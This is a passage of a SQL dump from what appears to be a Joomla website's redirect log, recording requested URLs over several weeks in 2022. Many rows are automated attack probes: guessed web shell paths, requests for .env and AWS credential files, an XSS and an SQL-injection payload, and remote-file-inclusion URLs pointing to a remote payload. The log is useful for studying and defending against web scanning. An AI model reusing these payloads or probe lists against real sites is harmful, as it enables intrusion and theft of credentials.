00:00:00',301),(30123,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-media-list-data.php',NULL,'','',5,0,'2022-09-15 15:35:04','0000-00-00 00:00:00',301),(30124,'http://3s-technologies.com.tr/en/0.php',NULL,'','',42,0,'2022-09-15 15:35:08','0000-00-00 00:00:00',301),(30125,'http://3s-technologies.com.tr/en/0byte.php',NULL,'','',18,0,'2022-09-15 15:35:15','0000-00-00 00:00:00',301),(30126,'http://3s-technologies.com.tr/en/r.php',NULL,'','',15,0,'2022-09-15 15:35:17','0000-00-00 00:00:00',301),(30127,'http://3s-technologies.com.tr/en/n.php',NULL,'','',15,0,'2022-09-15 15:35:18','0000-00-00 00:00:00',301),(30128,'http://3s-technologies.com.tr/en/wp-content/about.php',NULL,'','',23,0,'2022-09-15 15:35:19','0000-00-00 00:00:00',301),(30129,'http://3s-technologies.com.tr/en/goods.php',NULL,'','',168,0,'2022-09-15 15:35:23','0000-00-00 00:00:00',301),(30130,'http://3s-technologies.com.tr/en/blog.php',NULL,'','',6,0,'2022-09-15 15:35:25','0000-00-00 00:00:00',301),(30131,'http://3s-technologies.com.tr/en/g.php',NULL,'','',14,0,'2022-09-15 15:35:26','0000-00-00 00:00:00',301),(30132,'http://3s-technologies.com.tr/en/mari.php',NULL,'','',27,0,'2022-09-15 15:35:28','0000-00-00 00:00:00',301),(30133,'http://3s-technologies.com.tr/en/alfashell.php',NULL,'','',23,0,'2022-09-15 15:35:32','0000-00-00 00:00:00',301),(30134,'http://3s-technologies.com.tr/en/s.php',NULL,'','',42,0,'2022-09-15 15:35:33','0000-00-00 00:00:00',301),(30135,'http://3s-technologies.com.tr/en/i.php',NULL,'','',43,0,'2022-09-15 15:35:34','0000-00-00 00:00:00',301),(30136,'http://3s-technologies.com.tr/en/b.php',NULL,'','',16,0,'2022-09-15 15:35:37','0000-00-00 00:00:00',301),(30137,'http://3s-technologies.com.tr/en/p.php',NULL,'','',14,0,'2022-09-15 15:35:40','0000-00-00 00:00:00',301),(30138,'http://3s-technologies.com.tr/en/ws.php',NULL,'','',24,0,'2022-09-15 15:35:45','0000-00-00 00:00:00',301),(30139,'http://3s-technologies.com.tr/en/c.php',NULL,'','',39,0,'2022-09-15 15:35:46','0000-00-00 00:00:00',301),(30140,'http://3s-technologies.com.tr/en/xmlrpc.php',NULL,'','',125,0,'2022-09-15 15:35:47','0000-00-00 00:00:00',301),(30141,'http://3s-technologies.com.tr/en/v.php',NULL,'','',17,0,'2022-09-15 15:35:50','0000-00-00 00:00:00',301),(30142,'http://3s-technologies.com.tr/en/u.php',NULL,'','',17,0,'2022-09-15 15:35:52','0000-00-00 00:00:00',301),(30143,'http://3s-technologies.com.tr/en/wp-content/fw.php',NULL,'','',5,0,'2022-09-15 15:35:54','0000-00-00 00:00:00',301),(30144,'http://3s-technologies.com.tr/en/priv8.php',NULL,'','',24,0,'2022-09-15 15:35:57','0000-00-00 00:00:00',301),(30145,'http://3s-technologies.com.tr/en/mar.php',NULL,'','',18,0,'2022-09-15 15:36:00','0000-00-00 00:00:00',301),(30146,'http://3s-technologies.com.tr/en/y.php',NULL,'','',16,0,'2022-09-15 15:36:02','0000-00-00 00:00:00',301),(30147,'http://3s-technologies.com.tr/en/jindex.php',NULL,'','',17,0,'2022-09-15 15:36:03','0000-00-00 00:00:00',301),(30148,'http://3s-technologies.com.tr/en/ok.php',NULL,'','',17,0,'2022-09-15 15:36:08','0000-00-00 00:00:00',301),(30149,'http://3s-technologies.com.tr/en/k.php',NULL,'','',115,0,'2022-09-15 15:36:10','0000-00-00 00:00:00',301),(30150,'http://3s-technologies.com.tr/en/o.php',NULL,'','',20,0,'2022-09-15 15:36:11','0000-00-00 00:00:00',301),(30151,'http://3s-technologies.com.tr/en/wp-includes/991176.php',NULL,'','',4,0,'2022-09-15 15:36:12','0000-00-00 00:00:00',301),(30152,'http://3s-technologies.com.tr/en/wp-blog.php',NULL,'','',127,0,'2022-09-15 15:36:14','0000-00-00 00:00:00',301),(30153,'http://3s-technologies.com.tr/en/alwso.php',NULL,'','',6,0,'2022-09-15 15:36:15','0000-00-00 00:00:00',301),(30154,'http://3s-technologies.com.tr/en/wp-includes/about.php',NULL,'','',9,0,'2022-09-15 15:36:19','0000-00-00 00:00:00',301),(30155,'http://3s-technologies.com.tr/en/bypass.php',NULL,'','',24,0,'2022-09-15 15:36:21','0000-00-00 00:00:00',301),(30156,'http://3s-technologies.com.tr/en/wp-class.php',NULL,'','',18,0,'2022-09-15 15:36:22','0000-00-00 00:00:00',301),(30157,'http://3s-technologies.com.tr/en/wp-info.php',NULL,'','',22,0,'2022-09-15 15:36:23','0000-00-00 00:00:00',301),(30158,'http://3s-technologies.com.tr/en/alf.php',NULL,'','',38,0,'2022-09-15 15:36:24','0000-00-00 00:00:00',301),(30159,'http://3s-technologies.com.tr/en/edit-form.php',NULL,'','',6,0,'2022-09-15 15:36:25','0000-00-00 00:00:00',301),(30160,'http://3s-technologies.com.tr/en/mini.php',NULL,'','',71,0,'2022-09-15 15:36:27','0000-00-00 00:00:00',301),(30161,'http://3s-technologies.com.tr/en/wp-admin/fw.php',NULL,'','',5,0,'2022-09-15 15:36:29','0000-00-00 00:00:00',301),(30162,'http://3s-technologies.com.tr/en/xl.php',NULL,'','',15,0,'2022-09-15 15:36:33','0000-00-00 00:00:00',301),(30163,'http://3s-technologies.com.tr/en/wp-uploads.php',NULL,'','',4,0,'2022-09-15 15:36:34','0000-00-00 00:00:00',301),(30164,'http://3s-technologies.com.tr/en/wso1.php',NULL,'','',6,0,'2022-09-15 15:36:35','0000-00-00 00:00:00',301),(30165,'http://3s-technologies.com.tr/en/e.php',NULL,'','',17,0,'2022-09-15 15:36:36','0000-00-00 00:00:00',301),(30166,'http://3s-technologies.com.tr/en/hello.php',NULL,'','',15,0,'2022-09-15 15:36:38','0000-00-00 00:00:00',301),(30167,'http://3s-technologies.com.tr/en/new.php',NULL,'','',170,0,'2022-09-15 15:36:39','0000-00-00 00:00:00',301),(30168,'http://3s-technologies.com.tr/en/xx.php',NULL,'','',19,0,'2022-09-15 15:36:40','0000-00-00 00:00:00',301),(30169,'http://3s-technologies.com.tr/en/fx.php',NULL,'','',51,0,'2022-09-15 15:36:44','0000-00-00 00:00:00',301),(30170,'http://3s-technologies.com.tr/en/punisher.php',NULL,'','',1,0,'2022-09-15 15:36:45','0000-00-00 00:00:00',301),(30171,'http://3s-technologies.com.tr/en/wp-file.php',NULL,'','',14,0,'2022-09-15 15:36:46','0000-00-00 00:00:00',301),(30172,'http://3s-technologies.com.tr/en/public/403.php',NULL,'','',1,0,'2022-09-15 15:36:50','0000-00-00 00:00:00',301),(30173,'http://3s-technologies.com.tr/en/404.php',NULL,'','',103,0,'2022-09-15 15:36:52','0000-00-00 00:00:00',301),(30174,'http://3s-technologies.com.tr/en/small.php',NULL,'','',6,0,'2022-09-15 15:36:54','0000-00-00 00:00:00',301),(30175,'http://3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'','',8,0,'2022-09-15 15:36:56','0000-00-00 00:00:00',301),(30176,'http://3s-technologies.com.tr/en/marijuana.php',NULL,'','',22,0,'2022-09-15 15:36:58','0000-00-00 00:00:00',301),(30177,'http://3s-technologies.com.tr/en/wp2.php',NULL,'','',4,0,'2022-09-15 15:37:01','0000-00-00 00:00:00',301),(30178,'http://3s-technologies.com.tr/en/uploads/up.php',NULL,'','',6,0,'2022-09-15 15:37:04','0000-00-00 00:00:00',301),(30179,'http://3s-technologies.com.tr/en/shx.php',NULL,'','',15,0,'2022-09-15 15:37:06','0000-00-00 00:00:00',301),(30180,'http://3s-technologies.com.tr/en/root.php',NULL,'','',39,0,'2022-09-15 15:37:07','0000-00-00 00:00:00',301),(30181,'http://3s-technologies.com.tr/en/xxx.php',NULL,'','',19,0,'2022-09-15 15:37:09','0000-00-00 00:00:00',301),(30182,'http://3s-technologies.com.tr/en/m.php',NULL,'','',21,0,'2022-09-15 15:37:11','0000-00-00 00:00:00',301),(30183,'http://3s-technologies.com.tr/en/wp-content/wp.php',NULL,'','',10,0,'2022-09-15 15:37:12','0000-00-00 00:00:00',301),(30184,'http://3s-technologies.com.tr/en/wp-content/x.php',NULL,'','',5,0,'2022-09-15 15:37:15','0000-00-00 00:00:00',301),(30185,'http://3s-technologies.com.tr/en/q.php',NULL,'','',16,0,'2022-09-15 15:37:17','0000-00-00 00:00:00',301),(30186,'http://3s-technologies.com.tr/en/vuln.php',NULL,'','',15,0,'2022-09-15 15:37:26','0000-00-00 00:00:00',301),(30187,'http://3s-technologies.com.tr/en/date.php',NULL,'','',4,0,'2022-09-15 15:37:27','0000-00-00 00:00:00',301),(30188,'http://3s-technologies.com.tr/en/sh.php',NULL,'','',17,0,'2022-09-15 15:37:29','0000-00-00 00:00:00',301),(30189,'http://3s-technologies.com.tr/en/images/about.php',NULL,'','',6,0,'2022-09-15 15:37:31','0000-00-00 00:00:00',301),(30190,'http://3s-technologies.com.tr/en/wp-admin/maint/about.php',NULL,'','',12,0,'2022-09-15 15:37:33','0000-00-00 00:00:00',301),(30191,'http://3s-technologies.com.tr/en/w3llstore.php',NULL,'','',6,0,'2022-09-15 15:37:35','0000-00-00 00:00:00',301),(30192,'http://3s-technologies.com.tr/en/wso2.php',NULL,'','',16,0,'2022-09-15 15:37:37','0000-00-00 00:00:00',301),(30193,'http://3s-technologies.com.tr/en/100.php',NULL,'','',18,0,'2022-09-15 15:37:38','0000-00-00 00:00:00',301),(30194,'http://3s-technologies.com.tr/en/uploader.php',NULL,'','',17,0,'2022-09-15 15:37:39','0000-00-00 00:00:00',301),(30195,'http://3s-technologies.com.tr/en/fox.php',NULL,'','',17,0,'2022-09-15 15:37:40','0000-00-00 00:00:00',301),(30196,'http://3s-technologies.com.tr/en/l.php',NULL,'','',15,0,'2022-09-15 15:37:42','0000-00-00 00:00:00',301),(30197,'http://3s-technologies.com.tr/en/content.php',NULL,'','',47,0,'2022-09-15 15:37:44','0000-00-00 00:00:00',301),(30198,'http://3s-technologies.com.tr/en/wp-admin/css/fw.php',NULL,'','',5,0,'2022-09-15 15:37:46','0000-00-00 00:00:00',301),(30199,'http://3s-technologies.com.tr/en/c99.php',NULL,'','',16,0,'2022-09-15 15:37:49','0000-00-00 00:00:00',301),(30200,'http://3s-technologies.com.tr/en/f.php',NULL,'','',14,0,'2022-09-15 15:37:51','0000-00-00 00:00:00',301),(30201,'http://3s-technologies.com.tr/en/h.php',NULL,'','',20,0,'2022-09-15 15:37:52','0000-00-00 00:00:00',301),(30202,'http://3s-technologies.com.tr/en/wp-admin/radio.php',NULL,'','',34,0,'2022-09-15 15:38:00','0000-00-00 00:00:00',301),(30203,'http://3s-technologies.com.tr/en/w.php',NULL,'','',21,0,'2022-09-15 15:38:02','0000-00-00 00:00:00',301),(30204,'http://3s-technologies.com.tr/en/rss.php',NULL,'','',10,0,'2022-09-15 15:38:03','0000-00-00 00:00:00',301),(30205,'http://3s-technologies.com.tr/en/blog/fw.php',NULL,'','',6,0,'2022-09-15 15:38:10','0000-00-00 00:00:00',301),(30206,'http://3s-technologies.com.tr/en/wp-admin.php',NULL,'','',52,0,'2022-09-15 15:38:15','0000-00-00 00:00:00',301),(30207,'http://3s-technologies.com.tr/en/foxwso.php',NULL,'','',17,0,'2022-09-15 15:38:21','0000-00-00 00:00:00',301),(30208,'http://3s-technologies.com.tr/en/1337.php',NULL,'','',6,0,'2022-09-15 15:38:22','0000-00-00 00:00:00',301),(30209,'http://3s-technologies.com.tr/en/haxor.php',NULL,'','',18,0,'2022-09-15 15:38:25','0000-00-00 00:00:00',301),(30210,'http://3s-technologies.com.tr/en/wikindex.php',NULL,'','',18,0,'2022-09-15 15:38:27','0000-00-00 00:00:00',301),(30211,'https://3s-technologies.com.tr/tr/citrix/cgi/resources/list',NULL,'https://3s-technologies.com.tr/tr/citrix/cgi/Resources/List','',1,0,'2022-09-15 17:36:04','0000-00-00 00:00:00',301),(30212,'https://3s-technologies.com.tr/tr/cgi/resources/list',NULL,'https://3s-technologies.com.tr/tr/cgi/Resources/List','',1,0,'2022-09-15 17:36:09','0000-00-00 00:00:00',301),(30213,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez5/home-page-beez5','',3,0,'2022-09-16 20:20:45','0000-00-00 00:00:00',301),(30214,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/lps-c-detail',NULL,'','',1,0,'2022-09-16 20:22:18','0000-00-00 00:00:00',301),(30215,'http://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',1,0,'2022-09-16 20:22:21','0000-00-00 00:00:00',301),(30216,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spg-detail',NULL,'','',1,0,'2022-09-16 20:22:22','0000-00-00 00:00:00',301),(30217,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-vf_en_20_0101.pdf',NULL,'','',1,0,'2022-09-16 20:22:32','0000-00-00 00:00:00',301),(30218,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/cnc',NULL,'','',1,0,'2022-09-16 20:22:41','0000-00-00 00:00:00',301),(30219,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/temizleme-makineleri',NULL,'','',2,0,'2022-09-17 05:44:50','0000-00-00 00:00:00',301),(30220,'https://www.3s-technologies.com.tr/tr/portal',NULL,'https://www.3s-technologies.com.tr/tr/portal','',4,0,'2022-09-17 19:09:18','0000-00-00 00:00:00',301),(30221,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',12,0,'2022-09-18 01:23:52','0000-00-00 00:00:00',301),(30222,'https://3s-technologies.com.tr/core/.env',NULL,'','',22,0,'2022-09-18 17:25:30','0000-00-00 00:00:00',301),(30223,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2s-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-09-19 00:31:52','0000-00-00 00:00:00',301),(30224,'http://www.3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',39,0,'2022-09-19 10:59:45','0000-00-00 00:00:00',301),(30225,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',4,0,'2022-09-19 12:22:43','0000-00-00 00:00:00',301),(30226,'https://3s-technologies.com.tr/tr/repos?visibility=public',NULL,'https://3s-technologies.com.tr/repos?visibility=public','',1,0,'2022-09-19 19:29:53','0000-00-00 00:00:00',301),(30227,'https://3s-technologies.com.tr/accesson1.php',NULL,'https://3s-technologies.com.tr/en/component/users?view=login','',39,0,'2022-09-19 19:38:38','0000-00-00 00:00:00',301),(30228,'http://www.3s-technologies.com.tr/tr/anasayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',1,0,'2022-09-19 21:21:15','0000-00-00 00:00:00',301),(30229,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content','',4,0,'2022-09-20 03:15:28','0000-00-00 00:00:00',301),(30230,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail/askquestion?tmpl=component',NULL,'','',1,0,'2022-09-20 05:10:55','0000-00-00 00:00:00',301),(30231,'http://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',15,0,'2022-09-20 06:51:38','0000-00-00 00:00:00',301),(30232,'http://3s-technologies.com.tr/tr/upl.php',NULL,'','',7,0,'2022-09-20 13:21:15','0000-00-00 00:00:00',301),(30233,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/npm-w2-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-09-20 19:40:28','0000-00-00 00:00:00',301),(30234,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/av132-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-09-20 22:54:02','0000-00-00 00:00:00',301),(30235,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/modules/content-modules/most-read/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',2,0,'2022-09-22 00:33:23','0000-00-00 00:00:00',301),(30236,'http://www.3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',2,0,'2022-09-22 08:18:18','0000-00-00 00:00:00',301),(30237,'https://www.3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2022-09-22 08:18:20','0000-00-00 00:00:00',301),(30238,'http://www.3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'www.google.com','',1,0,'2022-09-22 08:18:24','0000-00-00 00:00:00',301),(30239,'https://www.3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'www.google.com','',1,0,'2022-09-22 08:18:38','0000-00-00 00:00:00',301),(30240,'http://mail.3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2022-09-22 08:18:54','0000-00-00 00:00:00',301),(30241,'https://mail.3s-technologies.com.tr/en/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2022-09-22 08:19:01','0000-00-00 00:00:00',301),(30242,'http://mail.3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'www.google.com','',1,0,'2022-09-22 08:19:03','0000-00-00 00:00:00',301),(30243,'https://mail.3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'www.google.com','',1,0,'2022-09-22 08:19:17','0000-00-00 00:00:00',301),(30244,'https://3s-technologies.com.tr/en/wp-includes/shell20211028.php',NULL,'www.google.com','',3,0,'2022-09-22 10:51:40','0000-00-00 00:00:00',301),(30245,'http://3s-technologies.com.tr/en/shell4.php',NULL,'www.google.com','',5,0,'2022-09-23 03:55:17','0000-00-00 00:00:00',301),(30246,'https://3s-technologies.com.tr/en/shell4.php',NULL,'www.google.com','',1,0,'2022-09-23 03:55:24','0000-00-00 00:00:00',301),(30247,'http://3s-technologies.com.tr/en/ru.php',NULL,'www.google.com','',5,0,'2022-09-23 03:55:28','0000-00-00 00:00:00',301),(30248,'https://3s-technologies.com.tr/en/ru.php',NULL,'www.google.com','',1,0,'2022-09-23 03:55:35','0000-00-00 00:00:00',301),(30249,'http://3s-technologies.com.tr/en/saudi.php',NULL,'www.google.com','',3,0,'2022-09-23 03:55:39','0000-00-00 00:00:00',301),(30250,'https://3s-technologies.com.tr/en/saudi.php',NULL,'www.google.com','',1,0,'2022-09-23 03:55:44','0000-00-00 00:00:00',301),(30251,'https://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',2,0,'2022-09-23 06:34:45','0000-00-00 00:00:00',301),(30252,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&itemid=40&lang=tr',NULL,'','',2,0,'2022-09-23 08:45:16','0000-00-00 00:00:00',301),(30253,'http://3s-technologies.com.tr/tr/vuln.htm',NULL,'','',2,0,'2022-09-23 14:37:03','0000-00-00 00:00:00',301),(30254,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:27','0000-00-00 00:00:00',301),(30255,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:28','0000-00-00 00:00:00',301),(30256,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:29','0000-00-00 00:00:00',301),(30257,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-t/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:30','0000-00-00 00:00:00',301),(30258,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-te/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:31','0000-00-00 00:00:00',301),(30259,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-tec/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:32','0000-00-00 00:00:00',301),(30260,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-tech/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:32','0000-00-00 00:00:00',301),(30261,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-techn/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:33','0000-00-00 00:00:00',301),(30262,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-techno/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:34','0000-00-00 00:00:00',301),(30263,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technol/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:34','0000-00-00 00:00:00',301),(30264,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technolo/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:35','0000-00-00 00:00:00',301),(30265,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technolog/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:36','0000-00-00 00:00:00',301),(30266,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technologi/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:37','0000-00-00 00:00:00',301),(30267,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technologie/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:37','0000-00-00 00:00:00',301),(30268,'http://3s-technologies.com.tr/components/com_jbusinessdirectory/assets/upload.php?t=1533049297&_root_app=/home/3s-technologies/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/',NULL,'','',2,0,'2022-09-23 14:37:38','0000-00-00 00:00:00',301),(30269,'https://3s-technologies.com.tr/api/agent/tabs/agentdata',NULL,'','',1,0,'2022-09-24 01:06:50','0000-00-00 00:00:00',301),(30270,'https://3s-technologies.com.tr/login.php',NULL,'\">alert(document.domain)\"','',1,0,'2022-09-24 01:06:50','0000-00-00 00:00:00',301),(30271,'https://3s-technologies.com.tr/wp-login.php?wlcms-action=preview',NULL,'','',1,0,'2022-09-24 01:06:50','0000-00-00 00:00:00',301),(30272,'http://3s-technologies.com.tr/tr/makhdamxshell.php',NULL,'','',6,0,'2022-09-25 09:00:59','0000-00-00 00:00:00',301),(30273,'http://3s-technologies.com.tr/tr/0byte',NULL,'','',6,0,'2022-09-25 09:01:40','0000-00-00 00:00:00',301),(30274,'http://3s-technologies.com.tr/tr/100.php',NULL,'','',111,0,'2022-09-25 09:02:19','0000-00-00 00:00:00',301),(30275,'http://3s-technologies.com.tr/tr/public/403.php',NULL,'','',11,0,'2022-09-25 09:11:51','0000-00-00 00:00:00',301),(30276,'http://3s-technologies.com.tr/tr/punisher.php',NULL,'','',4,0,'2022-09-25 09:11:58','0000-00-00 00:00:00',301),(30277,'http://3s-technologies.com.tr/tr/wp-includes/about.php',NULL,'','',167,0,'2022-09-25 09:17:17','0000-00-00 00:00:00',301),(30278,'https://3s-technologies.com.tr/admin/ajax.php?action=login',NULL,'','',2,0,'2022-09-25 11:54:46','0000-00-00 00:00:00',301),(30279,'https://3s-technologies.com.tr/admin/index.php',NULL,'','',5,0,'2022-09-25 11:54:46','0000-00-00 00:00:00',301),(30280,'https://3s-technologies.com.tr/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=) and updatexml(1,concat(0x7e,md5(\'999999\'),0x7e),1)--+',NULL,'','',1,0,'2022-09-25 15:46:03','0000-00-00 00:00:00',301),(30281,'https://3s-technologies.com.tr/conf_mail.php',NULL,'','',1,0,'2022-09-25 15:47:35','0000-00-00 00:00:00',301),(30282,'http://3s-technologies.com.tr/aws.credentials',NULL,'','',1,0,'2022-09-27 04:07:57','0000-00-00 00:00:00',301),(30283,'https://3s-technologies.com.tr/aws.credentials',NULL,'','',1,0,'2022-09-27 04:07:57','0000-00-00 00:00:00',301),(30284,'https://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',8,0,'2022-09-28 17:55:39','0000-00-00 00:00:00',301),(30285,'https://3s-technologies.com.tr/tr/health_check.php',NULL,'','',1,0,'2022-09-29 19:02:27','0000-00-00 00:00:00',301),(30286,'https://3s-technologies.com.tr/tr/pub/health_check.php',NULL,'','',1,0,'2022-09-29 19:02:28','0000-00-00 00:00:00',301),(30287,'http://3s-technologies.com.tr/tr/ãƒâƒã‚â¼rãƒâƒã‚â¼nler/thru-hole/rl132-detail',NULL,'','',1,0,'2022-09-30 00:03:29','0000-00-00 00:00:00',301),(30288,'http://3s-technologies.com.tr/tr/wp-admin/includes',NULL,'','',83,0,'2022-09-30 09:30:38','0000-00-00 00:00:00',301),(30289,'http://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',4,0,'2022-10-01 06:18:04','0000-00-00 00:00:00',301),(30290,'http://3s-technologies.com.tr/en/xltavrat.php',NULL,'','',4,0,'2022-10-01 15:56:38','0000-00-00 00:00:00',301),(30291,'http://3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'','',34,0,'2022-10-02 03:50:43','0000-00-00 00:00:00',301),(30292,'http://3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',3,0,'2022-10-02 11:41:32','0000-00-00 00:00:00',301),(30293,'http://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',3,0,'2022-10-02 18:10:13','0000-00-00 00:00:00',301),(30294,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:44:07','0000-00-00 00:00:00',301),(30295,'http://mail.3s-technologies.com.tr/en/admin.php',NULL,'anonymousfox.co','',2,0,'2022-10-03 03:44:14','0000-00-00 00:00:00',301),(30296,'http://mail.3s-technologies.com.tr/en/boom.php?x',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:44:48','0000-00-00 00:00:00',301),(30297,'http://mail.3s-technologies.com.tr/en/wp-content/db_cache.php',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:44:59','0000-00-00 00:00:00',301),(30298,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:06','0000-00-00 00:00:00',301),(30299,'http://mail.3s-technologies.com.tr/en/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:10','0000-00-00 00:00:00',301),(30300,'http://mail.3s-technologies.com.tr/en/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:17','0000-00-00 00:00:00',301),(30301,'http://mail.3s-technologies.com.tr/en/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:22','0000-00-00 00:00:00',301),(30302,'http://mail.3s-technologies.com.tr/en/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',1,0,'2022-10-03 03:45:27','0000-00-00 